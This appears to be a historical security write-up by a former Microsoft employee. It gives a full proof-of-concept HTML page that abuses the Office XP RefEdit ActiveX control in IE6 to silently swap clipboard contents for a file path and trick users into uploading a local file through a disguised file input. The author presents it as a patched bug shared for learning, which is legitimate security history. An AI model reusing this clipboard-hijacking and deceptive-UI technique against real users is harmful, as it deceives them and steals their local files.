IE6 RefEdit Cut Phish GetFiles

The Office XP RefEdit ActiveX control has a Cut method that writes to the clipboard without triggering IE’s clipboard permission prompt. A page can use this to silently replace whatever text the user copies — with a file path — so that when the user pastes what they believe is their email address into a second input field, they’re actually pasting a server-side path that gets submitted as a file upload.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Phishing with IE6 and RefEdit Control</title></head>
<body>
<div style="position:absolute;top:10px;left:10px;">
	<div style="position:absolute;top:0px;left:0px;width:400px;height:120px;border:ridge;"></div>
	<div style="position:absolute;top:0px;left:0px;width:160px;height:300px;">
		<input tabindex=1 oncopy="setTimeout('changeClipBoardData();',1)" type="text" id="iText" style="width:151px;position:absolute;top:10px;left:10px;">
		<input tabindex=2 onpaste="hideInputFileAndShowInputText();" type="file" id="iFile" style="width:240px;position:absolute;top:40px;left:10px;">
		<input type="text" id="iFakeFile" style="visibility:hidden;width:151px;position:absolute;top:40px;left:10px;">

	</div>
	<div id="daCover" style="position:absolute;top:10px;left:168px;width:200px;height:100px;background-Color:#ffffff">
		<span style="position:absolute;top:2px;left:10px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">Enter your E-Mail address</span>
		<span style="position:absolute;top:32px;left:10px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">Confirm Your E-Mail Address</span>
	</div>
	<input type="submit" onclick="showTheRealThing();" style="position:absolute;top:90px;left:120px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">
</div>
<object style="position:absolute;top:-100000px;" id="oText" classid="clsid:00024512-0000-0000-C000-000000000046" width="200" height="50"></object>

<script language="JavaScript">
function changeClipBoardData()
{
	oText.Text="C:\\Windows\\System32\\sol.exe";
	oText.SelStart=0;
	oText.SelLength=oText.Text.length;
	oText.Cut();
}
function hideInputFileAndShowInputText()
{
	iFile.style.visibility='hidden';
	iFakeFile.style.visibility='visible';
	iFakeFile.focus();
	iFakeFile.value=iText.value;
}
function showTheRealThing()
{
	iFile.style.visibility='visible';
	explanation.style.visibility='visible';
	iFile.style.width='350px';
	daCover.style.visibility='hidden';
	iText.style.visibility='hidden';
	iFakeFile.style.visibility='hidden';
}
window.onload=function()
{
	if (oText.readyState!=4)
	{
		alert("Sorry, this little bug works only in IE6 with Office XP installed");
	}
}
</script>
</body>
</html>

The flow: the user types their email address, then copies it to paste in the second field. The oncopy event fires, and the RefEdit control silently cuts C:\Windows\System32\sol.exe into the clipboard. The user pastes what they believe is their email into the second input (actually a hidden file input), which gets pre-filled with the path. After submit, the server receives that file. The visible UI hides all of this completely.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.